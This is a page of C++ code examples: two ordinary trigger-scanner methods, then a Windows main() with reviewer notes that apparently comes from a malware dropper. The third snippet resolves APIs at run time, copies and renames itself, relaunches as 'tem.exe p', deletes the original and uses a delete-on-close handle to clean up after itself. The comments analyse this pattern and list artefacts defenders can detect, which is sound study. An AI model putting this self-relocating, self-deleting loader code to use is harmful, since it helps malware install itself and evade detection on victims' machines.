예제 #1
/*
** Constructor
**
** Passes the event name, opcode and test value through to the
** CTriggerScanner base and keeps copies of the category and key names.
*/
CTriggerScannerHw::CTriggerScannerHw(LPCSTR pszEventName, int nOpCode, LPCSTR pszTestVal, LPCSTR pszCat, LPCSTR pszKey)
	: CTriggerScanner(pszEventName, nOpCode, pszTestVal), m_strCat(pszCat), m_strKey(pszKey)
{
	// Start with both result slots empty so neither pointer is ever read
	// uninitialised.
	m_pDataNew = NULL;
	m_pDataOld = NULL;

	// Pick the hardware scanner that matches the category name. The factory
	// result is stored as-is; no null check is made at this point.
	m_pDataNew = CHardwareScanner::HardwareScanner(m_strCat, GetCFG());
}
예제 #2
/*
** Collect results for this category
**
** The current result set becomes the "old" one, a fresh scanner is created
** for the category and run. Returns the scanner's own Scan() result, or
** FALSE when no scanner could be created.
*/
BOOL CTriggerScannerHw::Scan()
{
	// Drop the older snapshot; deleting a null pointer is a no-op, so no
	// guard is needed.
	delete m_pDataOld;

	// Rotate current -> old, and clear the current slot before the factory
	// call so the two members never refer to the same object while it runs.
	m_pDataOld = m_pDataNew;
	m_pDataNew = NULL;

	// Build the scanner for this category and run it.
	m_pDataNew = CHardwareScanner::HardwareScanner(m_strCat, GetCFG());
	if (!m_pDataNew)
		return FALSE;

	return m_pDataNew->Scan();
}
예제 #3
/*
** Program entry point (analysis notes).
**
** What this function visibly does:
**  - argc == 2 : spin until "2tem.exe" can be deleted, start "net", return 0.
**  - otherwise : read CPU architecture and OS version, load the configuration
**                with GetCFG() and hand it to ReleaseOn64Bit() or
**                ReleaseOnVistaOrXP(). Those helpers are defined elsewhere;
**                what they write or install cannot be seen from here.
**  - argc == 1 : afterwards copy the running image to "tem.exe", rename the
**                original to "2tem.exe", open the copy with delete-on-close
**                and relaunch it as "tem.exe p" (which takes the argc == 2
**                path above).
**
** Returns 0 on every path except when GetVersionExA fails or reports major
** version 4, where it returns -1.
**
** NOTE(review): the copy / rename / delete-on-close / relaunch sequence is a
** self-relocation and self-cleanup pattern, and together with the Release*
** helper names it resembles a dropper - confirm against those helpers.
** Artefacts a defender can look for, all taken from the literals below:
** creation of "tem.exe" and "2tem.exe" in the working directory, a child
** process whose command line is "tem.exe p", and a child "net" process.
** All file names are relative to the current working directory and no API
** return value is checked.
*/
int main(int argc, char* argv[])
{
	HMODULE hKernel;
	// NOTE(review): the resolved function addresses are stored in int. That
	// only holds a full pointer where int and pointers have the same width;
	// a 64-bit build would truncate them.
	int funCopyF, funCreateF, funCreateP;
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	SECURITY_ATTRIBUTES sa;

	// CopyFileA, CreateFileA and CreateProcessA are looked up at run time and
	// later called through hand-written __stdcall casts instead of their
	// declared prototypes, so the compiler cannot check any argument.
	// The API names still appear as plain strings in the binary.
	// Neither hKernel nor the three lookups are checked for failure.
	hKernel = GetModuleHandleA("kernel32.dll");
	funCopyF = (int)GetProcAddress(hKernel, "CopyFileA");
	funCreateF = (int)GetProcAddress(hKernel, "CreateFileA");
	funCreateP = (int)GetProcAddress(hKernel, "CreateProcessA");

	// Zero the structures CreateProcessA reads and fills in.
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));
	
	// Second stage: reached when exactly one argument was passed, which is
	// how the argc == 1 path below relaunches the copy ("tem.exe p").
	if ( argc == 2 )
	{
		// Busy-wait until the renamed original can be deleted. There is no
		// delay and no retry limit: if "2tem.exe" does not exist or never
		// becomes deletable, this loop spins forever at full CPU.
		while ( !DeleteFileA("2tem.exe") )
			;
		
		// CreateProcessA, by argument position: no application name, command
		// line "net", handle inheritance on (1), creation flags 2
		// (DEBUG_ONLY_THIS_PROCESS), default environment and directory.
		// NOTE(review): with that flag this process acts as the debugger of
		// the child, and it returns immediately afterwards - the child is
		// presumably terminated along with it; confirm the intent.
		// The process and thread handles returned in pi are never closed.
		((void (__stdcall *)(DWORD, char *, DWORD, DWORD, signed int, signed int, DWORD, DWORD, int *, int *))funCreateP)(
		  0,
		  "net",
		  0,
		  0,
		  1,
		  2,
		  0,
		  0,
		  (int*)&si,
		  (int*)&pi);
		return 0;
	}
  
	// Anything other than PROCESSOR_ARCHITECTURE_INTEL is treated as
	// "not 32-bit" by the dispatch below.
	SYSTEM_INFO sInfo;
	GetNativeSystemInfo(&sInfo);
	//GetSystemInfo(&sInfo);
	bool is32Bit = sInfo.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_INTEL;
	
	// Bail out with -1 when the version query fails or reports major
	// version 4.
	OSVERSIONINFOA vInfo;
	ZeroMemory(&vInfo, sizeof(vInfo));
	vInfo.dwOSVersionInfoSize = sizeof(vInfo);
	if (!GetVersionExA(&vInfo) || vInfo.dwMajorVersion == 4 )
		return -1;

	// Configuration comes from GetCFG(), defined elsewhere; its contents and
	// origin are not visible in this function.
	union client_cfg gCFG;
	GetCFG(gCFG);

	// 64-bit systems need special handling first
	if(is32Bit == false)	ReleaseOn64Bit(gCFG);
	// Handling for Windows Vista and 7 (major version 6)
	else if(vInfo.dwMajorVersion == 6)	ReleaseOnVistaOrXP(gCFG, false);
	// Major version 5; the `true` argument presumably selects the XP path -
	// confirm in ReleaseOnVistaOrXP. Other major versions do nothing here.
	else if(vInfo.dwMajorVersion == 5)	ReleaseOnVistaOrXP(gCFG, true);

	// First stage: only when started without arguments.
	if(argc == 1)
	{
		// CopyFileA(argv[0], "tem.exe", FALSE): copy the running image and
		// overwrite any existing "tem.exe".
		((void (__stdcall *)(const char *, DWORD, DWORD))funCopyF)(argv[0], (DWORD)"tem.exe", 0);
		
		// Rename the running image so the second stage can delete it.
		MoveFileA(argv[0], "2tem.exe");
		
		// Inheritable handle: the child started below receives it because
		// CreateProcessA is called with handle inheritance on.
		sa.nLength = sizeof(sa);
		sa.lpSecurityDescriptor = NULL;
		sa.bInheritHandle = TRUE;
		// CreateFileA, by argument position: "tem.exe", no access rights (0),
		// share mode 1 (FILE_SHARE_READ), the attributes above, disposition 3
		// (OPEN_EXISTING), flags 67108864 == 0x04000000
		// (FILE_FLAG_DELETE_ON_CLOSE). The copy is therefore removed once the
		// last handle to it is closed. The returned handle is discarded by
		// the void-returning cast, so it can be neither checked nor closed.
		((void (__stdcall *)(DWORD, DWORD, signed int, int *, signed int, signed int, DWORD))funCreateF)(
			(DWORD)"tem.exe",
			  0,
			  1,
			  (int*)&sa,
			  3,
			  67108864,
			  NULL);
    
		// CreateProcessA, by argument position: command line "tem.exe p",
		// handle inheritance on (1), no creation flags. The extra argument
		// gives the child argc == 2, i.e. the second-stage branch above.
		// The handles returned in pi are never closed.
		((void (__stdcall *)(DWORD, DWORD, DWORD, DWORD, signed int, DWORD, DWORD, DWORD, int *, int *))funCreateP)(
			0,
			(DWORD)"tem.exe p",
			0,
			0,
			1,
			0,
			0,
			0,
			(int*)&si,
		    (int*)&pi);
	}
	
	return 0;
}